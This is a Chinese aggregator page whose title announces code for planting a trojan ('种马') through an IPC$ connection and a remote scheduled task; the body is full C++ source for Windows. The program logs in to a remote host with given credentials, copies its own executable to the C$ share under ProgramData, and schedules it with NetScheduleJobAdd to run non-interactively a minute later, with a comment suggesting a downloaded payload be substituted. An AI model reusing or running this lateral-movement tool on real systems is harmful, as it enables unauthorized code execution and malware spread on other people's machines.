实现:ipc管道连接到远程计划任务种马

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实现:ipc管道连接到远程计划任务种马相关的知识,希望对你有一定的参考价值。

#pragma comment(lib, "mpr.lib")
#pragma comment(lib,"Netapi32.lib")
#include <windows.h>
#include <lm.h>
#include <tchar.h>
#include <stdio.h>
#include <Winnetwk.h>
#include <string>
#include <lmat.h>

//using namespace std;
void GetError(DWORD ret) {
    wchar_t * pMsgBuf;
    FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS
        , NULL, ret, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&pMsgBuf, 0, NULL);
    wprintf(L"WNetAddConnection2 failed with error: %u, %s \n", ret, pMsgBuf);
    LocalFree(pMsgBuf);
}

int wmain(int argc, wchar_t * argv[]) {
    /*
    DWORD WNetAddConnection2W(
        LPNETRESOURCEW lpNetResource,
        LPCWSTR        lpPassword,
        LPCWSTR        lpUserName,
        DWORD          dwFlags
    );
    
    */

    DWORD dwRetVal;
    std::wstring MyRemoteName;
    NETRESOURCE nr;
    DWORD dwFlags;

    MyRemoteName.append(L"\\\\");

    if (argc != 5 && argc != 4) {
        wprintf(L"Usage: %s <localname> <remotename> <username> <password>\n",argv[0]);
        wprintf(L"Usage: %s <remotename> <username> <password>\n",argv[0]);
        exit(1);
    }

    if (argc == 5) {
        MyRemoteName.append(argv[2]);
        wprintf(L"Calling WNetAddConnection2 with\n");
        wprintf(L"  lpLocalName = %s\n", argv[1]);
        wprintf(L"  lpRemoteName = %s\n", MyRemoteName.c_str());
        wprintf(L"  lpUsername = %s\n", argv[3]);
        wprintf(L"  lpPassword = %s\n", argv[4]);
        
        memset(&nr, 0, sizeof(NETRESOURCE));

        nr.dwType = RESOURCETYPE_ANY;
        nr.lpLocalName = argv[1];
        nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str();
        nr.lpProvider = NULL;

        dwFlags = CONNECT_TEMPORARY;  //连接类型 是否可持续
        dwRetVal = WNetAddConnection2(&nr, argv[4], argv[3], dwFlags);
        if (dwRetVal == NO_ERROR) {
            wprintf(L"Connection added to %s\n", nr.lpRemoteName);
        }
        else {
            GetError(dwRetVal);
        }
    }
    else if (argc == 4) {
        MyRemoteName.append(argv[1]);
        wprintf(L"Calling WNetAddConnection2 with\n");
        wprintf(L"lpRemoteName = %s\n", (LPWSTR)MyRemoteName.c_str());
        wprintf(L"lpUsername = %s\n", argv[2]);
        wprintf(L"lpPassword = %s\n", argv[3]);

        //结构体初始化
        memset(&nr, 0, sizeof(NETRESOURCE));


        //结构体的补充,这四个必须填写
        nr.dwType = RESOURCETYPE_ANY;
        nr.lpLocalName = NULL; //本地映射磁盘
        nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str(); // 远程访问的资源
        nr.lpProvider = NULL;

        dwFlags = CONNECT_TEMPORARY; //连接类型 是否可持续
        dwRetVal = WNetAddConnection2(&nr,argv[3], argv[2], dwFlags);
        if (dwRetVal == NO_ERROR){
            //IPC管道成功连接
            wprintf(L"Connection added to %s\n", nr.lpRemoteName);
            
            //RemoteFilePath字符串用来拼接路径
            std::wstring RemoteFilePath;

            RemoteFilePath = MyRemoteName.append(L"\\c$\\ProgramData\\mytask.exe"); // \\192.168.1.152\c$ProgramData\mytask.exe
            //复制文件到对方的机器的指定目录中
            wchar_t LocalModuleEXE[MAX_PATH];
            GetModuleFileName(NULL, LocalModuleEXE, MAX_PATH); //得到当前执行文件的文件名称 (包含路径)  之后可以改为远程下载的指定exe程序等....
            if (CopyFile(LocalModuleEXE, RemoteFilePath.c_str(), FALSE) != 0) { //复制文件 若存在则覆盖
                //获取远程服务器的当前时间
                wprintf(L"copyfile successful\n");

                //初始化结构体
                LPTIME_OF_DAY_INFO ti = NULL;
                std::wstring MyRemoteServerName;

                //MyRemoteServerName字符串用来作为 \\ip 这样的形式进行调用
                MyRemoteServerName.append(L"\\\\");
                MyRemoteServerName.append(argv[1]);

                if (NetRemoteTOD(MyRemoteServerName.c_str(), (LPBYTE *)&ti) == NERR_Success) {
                    wprintf(L"Get remote time successful\n");
                    //拼接字符串进行计划任务的添加
                
                    //DWORD day = 1;
                    wchar_t command[] = L"c:\\ProgramData\\mytask.exe";
                    AT_INFO at; //结构体的设置
                    at.DaysOfWeek = 0;
                    at.DaysOfMonth = 0;
                    at.Flags = JOB_NONINTERACTIVE; //非交互式运行程序
                    at.JobTime = ((ti->tod_hours + (-ti->tod_timezone) / 60) % 24) * 60 * 60 * 1000 + (ti->tod_mins + 1) * 60 * 1000;
                    at.Command = command; //需要执行的命令内容
                    
                    
                    DWORD id;
                    if(NetScheduleJobAdd(MyRemoteServerName.c_str(),(LPBYTE)&at,&id) == NERR_Success){
                        wprintf(L"Job add successful\n");
                    }
                    else {
                        wprintf(L"Job add failed\n");
                    }
                }
                else {
                    wprintf(L"Get remote time failed\n");
                }
            }
            else {
                wprintf(L"copyfile failed\n");
            }
        }
        else {
            GetError(dwRetVal);
        }
    }

    return 0;
}

参考文章:https://blog.csdn.net/weixin_34408624/article/details/86248485

以上是关于实现:ipc管道连接到远程计划任务种马的主要内容,如果未能解决你的问题,请参考以下文章

将管道连接到子进程

如何在powershell的任务调度程序中设置触发器“连接到用户会话”?

ECS Fargate 计划任务无法连接到 ECR

IPC$ 命名管道

怎样进行IPC连接?

如何修复Git中的'packet_write_wait:连接到...管道损坏'错误